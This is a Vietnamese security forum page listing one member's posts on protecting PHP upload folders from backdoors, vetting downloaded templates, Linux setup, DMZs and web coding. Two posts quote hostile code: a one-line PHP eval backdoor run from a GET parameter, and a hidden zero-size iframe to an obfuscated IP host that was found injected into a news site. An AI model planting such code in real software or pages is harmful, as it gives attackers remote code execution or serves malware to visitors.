banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: protectHat  XML
Profile for protectHat Messages posted by protectHat [ number of posts not being displayed on this page: 0 ]
 
Còn một cái nữa cho bạn là khi mà ứng dụng lớn thì người ta dùng database là noSQL. Bạn tham khảo thêm nha

smile_sad wrote:
Theo mình nghĩ thông thường các folder cho phép upload chủ yếu là images,thumbs... Vậy nếu backdoor upload vào đây thì chắc nó là .php, .asp, .aspx...

Mình rành linux hơn windows 1 chút nên mình xin nói về linux nhé.

Ý kiến của mình là tạo 1 file .htaccess remove toàn bộ handler .php. Rồi chmod cái .htaccess này sao cho người ta không override nó được.

Tuy nhiên nếu mà source code có quá nhiều folder cho phép upload, việc lạm dụng .htaccess sẽ ảnh hưởng đến performance của hệ thống. Do đó nếu bạn thành thạo code thì có lẽ phải can thiệp vào code để xứ lí thôi.

Ở trên mình đưa ra tình huống là cái form upload đó đã chỉ định upload vào 1 folder trong sourcecode. Nhưng nếu attacker tạo mới 1 folder sau đó ném backdoor vào thì phải làm sao?

Mọi người tiếp tục thảo luận nhé. 

backdoor thường có đuôi là .jpg bạn ạ smilie;
Dùng firephp là cách dễ nhất, đơn giản nhất đó. Nhưng mà dùng NULL thì dính backdoor là thường

chiro8x wrote:

Bạn nghĩ sao về đoạn mã nhỏ này:
Code:
<?php
....
if(isset($_GET['chiro8x']))eval($_GET['chiro8x']);
....
?>

Have fun ^^!. 

smilie
Mình đã bị cái này nè
Code:
<?php
if ($date==time()) include(????)
?>

Nếu mà có thời gian ngồi coi từng dòng như vậy thì viết ra còn lẹ hơn smilie, nhưng mà project đã đến hạn nên phải tìm null smilie
Thường khi tải một cái template hay một com về. việc đầu tiên là mình dùng AV quét nó (AVG làm tốt việc này). Sau đó mình sẽ xem các thư mục hình ảnh theo chế độ thumbnail. Các hình ảnh mà không hiển thị hoặc quá bé thì sẽ nén lại thành 1 file zip rồi đưa cho virustotal kiểm tra. Về phần code thì mình chạy lên ở local và bật firebug (net) xem code có tải gì khác ở chỗ nào hay không.
Lúc đó mới xem trong code có gì.

xnohat wrote:

Đúng vây, việc học một ngôn ngữ lập trình không đơn giản chỉ là học hiểu "cú pháp" ( Programming language sytax ), mà là tổ hợp nhiều kiến thức liên quan đến môn khoa học là khoa học máy tính ( Computer Science ). Vì, biết "cú pháp" của ngôn ngữ không, thì chẳng làm được việc gì, nếu không muốn nói là "vô ích", do ngôn ngữ lập trình chỉ là công cụ diễn dịch tư duy của con người thành các chỉ thị cho máy tính thực thi. 

Theo mình mốc thời gian đó có thể hiểu như là thời gian đi học. Học không chỉ một ngôn ngữ đó mà hình dung được mình sẽ làm được gì với nó. Từ những kiến thức về OOP, array ... thì việc mình học tiếp thêm một ngôn ngữ lập trình khác rất là nhanh. Hay nói cách khác là khi mình đã không biết được 1 ngôn ngữ nào cả thì việc học để master 1 cái rất là quan trọng và tốn thời gian. Khi đã được một cái rồi thì nhìn sang ngôn ngữ khác thấy đơn giản hơn. Khi đó mà mình muốn học ngôn ngữ khác thì chỉ cần học những cái khác, cái hay hơn so với cái đầu mà thôi.
Thêm một ví dụ nữa là nhiều bạn hỏi nên chọn distro linux nào cho việc bắt đầu. Nhiều người sẽ nói bạn là hãy chọn 1 cái nào mà nhiều tài liệu, nhiều sự hỗ trợ thì dễ học. Sau khi dùng đã quen thì tự bản thân người hỏi sẽ biết là cái nào là phù hợp nhất cho mình
Năm nay bạn bao nhiêu tuổi? Con shell đó là của bạn hay là của người ta cho bạn? Máy windows đang chạy thì bạn copy file SAM như vậy thì M$ bán win cho ai nữa?
Bạn chia sẻ cách giải quyết đi. Lỡ mai mốt có ai search vô thì biết cách giải quyết luôn

Bướm Đêm wrote:
ngừi ta đã bảo bị fake mail add, dùng google yahoo gì cũng fake và bulk được ráo heheheeeeeee, băm cả cái header nhìn ko ra lun ^^, có thể dùng script, dùng 1 cái mua hay cái tool gì đó lừa tình cái mta thì nó chuyển tới mta ngừi nhận nếu config ko ok, máy cái webmail free từ yahoo, google thì sao mà đỡ đc >"<
google app cho 50 users dùng full chức năng mà kakakaaaa 

Nay nó giảm xuống 10 rồi bác
1. Mình nghĩ rất đơn giản là dùng .htaccess để bắt lỗi nó, không cần chỉnh apache.
2. tạo thêm cái alias
Nếu sợ mất data thì nên cài vô máy ảo thử trước để hiểu. trong máy ảo cũng chia 4 partition. 1 cái bỏ data, 1 cái bỏ win (Nếu bạn cài win trước thì sau khi cài fedora nó tự nhận được luôn không cần chỉnh gì thêm), 1 cái cho fedora và 1 cái cho swap (dung lượng thường là gấp đôi RAM, RAM 512 thì nó là 1G)
Chỉ đến cái grub thì bạn nên tìm coi cái máy boot như thế nào để biết kỹ hơn.
Coi bạn kia có poison máy cậu ko? :d

tommysmith wrote:
Thanks, mình làm được rồi smilie mà mình vào folder boot tuy thấy mấy phiên bản cũ ở đó nhưng ko có quyền xoá, nên search thêm hồi thì thấy vào synaptic tìm mấy phiên bản cũ remove ok rồi smilie 

Theo mình bạn có thể chỉnh trong boot/grub/grub.cfg để chỉnh menu thôi mà không xoá các kernel cũ
Xin lỗi về sự cố này! file bạn yêu cầu không tồn tại trên server cảu chúng tôi!
Theo mình bạn nên thử down đĩa rescue của Kaspersky ở đây http://support.kaspersky.com/viruses/rescuedisk về quét. Tải về, bỏ vào usb, khởi động từ usb, update và quét. Sau đó mới vào win lại. Có thể sẽ gặp lỗi thì tuỳ lỗi mà xử lý tiếp
http://tutorial.phpvn.org/
Các bạn biết hết các process đang chạy trong máy thì còn sợ gì bị virus. :d
Mình mà mở file ẩn không được là biết chắc luôn.
Bạn thử nói rõ hơn về vị trí cũng như cấu hình mạng của bạn xem. Có phải cái máy ảo có ip là 169.xxx không
Tôi thấy khigiadano nói đúng mà. Trong linux thì làm gì có cơ chế bảo vệ như trong win. Chỉ cần copy đè lên là xong.

TQN wrote:
Không chắc, có thể máy của cậu protectHat dính virus thì sao ? 

Em có thử cả với máy win và 1 máy Ubuntu rồi mới hỏi mà anh? Tại vì sợ lỡ như mạng bị dính virus mà nó chèn cái iframe lên đầu trang như vậy mà báo cho bên tuổi trẻ thì phiền nên em mới hỏi mọi người

PS: Hôm nay vào lại đúng là đã được gỡ ra
Sáng nay mình vào chỗ báo tuổi trẻ địa ốc coi tự nhiên thấy có báo có virus. Xem source thấy có dòng
Code:
iframe src="http://0x56378C02/25mini/irhqbujzeshod.php" width=0 height=0 frameborder=0></iframe


Mọi người xem giùm mình đó là tại máy mình hay tại báo vậy. Đoạn đó đếm gì mà mình coi không được
>
Mình nói thế này cho các bạn chưa hiểu về DMZ hiểu: VD bây giờ bạn có 1 cái server( mình vd luôn nó chạy web ) đặt tại công ty, công ty bạn có 1 đường ra internet. Các nhân viên trong công ty cũng truy cập internet bằng đường này. Nếu bây giờ bạn cho tất cả đứng sau firewall thì nhân viên có thể truy cập trực tiếp đến server và ngược lại. Nếu nhân viên ở trong mà tấn công hoặc đơn giản là máy nhân viên bị virus thì sẽ bị ảnh hưởng rất lớn vì 2 máy đó ở trong LAN với nhau. Mặt khác nếu web bị lỗi (firewall vẫn chạy tốt, kiểu như bị lỗi SQL inject chẳng hạn. ) thì hacker có thể truy cập đến các máy trong mạng LAN và lấy đi các thông tin trong đó.
Bạn nên hiểu là trong DMZ có các máy tính chứ nó không phải là 1 tầng cản lọc như là firewall
Lúc trước mình cũng có làm 1 cái tool để treo nick như vậy nhưng viết bằng VB6, khi nào rảnh mình kiếm source đưa cho mà treo. Chứ đưa cả id với pass như vậy mất không có gì để tiếc đâu
Nếu bạn dùng bản jquery 1.5 thì ajax cũng cross-domain được.
Cái domain.com đó là cùng sever với js hay sao?

mình demo 1 đoạn code dùng jquery lấy file txt nha
Code:
$(document).ready(function(){
function contentDisp(){
$.ajax({
url : "1.txt",
success : function (data) {
$("#content").html(data);
}
});
}
contentDisp();
});
File của bạn là định dạng gì ? doc, xls ... của m$ hay tất cả các loại.
@zalman: Mình cũng chưa gặp trường hợp như bạn nhưng có nghe nói đến hệ thống của windows có thể làm được. bạn thử http://www.microsoft.com/windowsserver2003/technologies/rightsmgmt/default.mspx xem sao rồi báo kết quả nha (vì mình cũng chưa làm).

@chube: với googlebook thì nó dùng -moz-user-select(mình dùng firefox) để không cho phép mình chọn trên các vùng text hay hình ảnh đó thì mình dùng một cách cực củ chuối là chọn view->page style->no style là vô tư copy các hình ảnh hay text đó (bạn thử đọc Adventures of Sherlock Holmes coi :d)
Theo mình mà bạn chưa học gì về web cả. Bây giờ mà bắt đầu bằng HTML thì nên học HTML5 luôn, đừng down ebook cho nặng mà tham khảo các tuts thì nhanh hiểu hơn. Khi đã có kiến thức cơ bản rồi hãy đọc sách
MVC thì không phụ thuộc vào ngôn ngữ bạn ạ. PHP cũng có MVC :d
bạn có thể tham khảo 1 framework hỗ trợ MVC cho php ở codeigniter.com
Bạn xem lại thông tin đó nha. Trang của bạn đưa ra là Open Source in Mac OS X.
theo http://www.apple.com/opensource/ đoạn
Code:
As the first major computer company to make Open Source development a key part of its ongoing software strategy, Apple remains committed to the Open Source development model. Major components of Mac OS X, including the UNIX core, are made available under Apple’s Open Source license, allowing developers and students to view source code, learn from it and submit suggestions and modifications. In addition, Apple uses software created by the Open Source community, such as the HTML rendering engine for Safari, and returns its enhancements to the community.

Thì cái nhân của nó được phân phối theo Apple’s Open Source license. Còn nguyên cái mac os x thì là close source smilie.


Bạn biết nick mà cũng không làm gì được thì tớ gửi cho một hướng dẫn từ a=>z có hình minh hoạ nè.



smilie
 
Go to Page:  2 3 4 Page 5 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|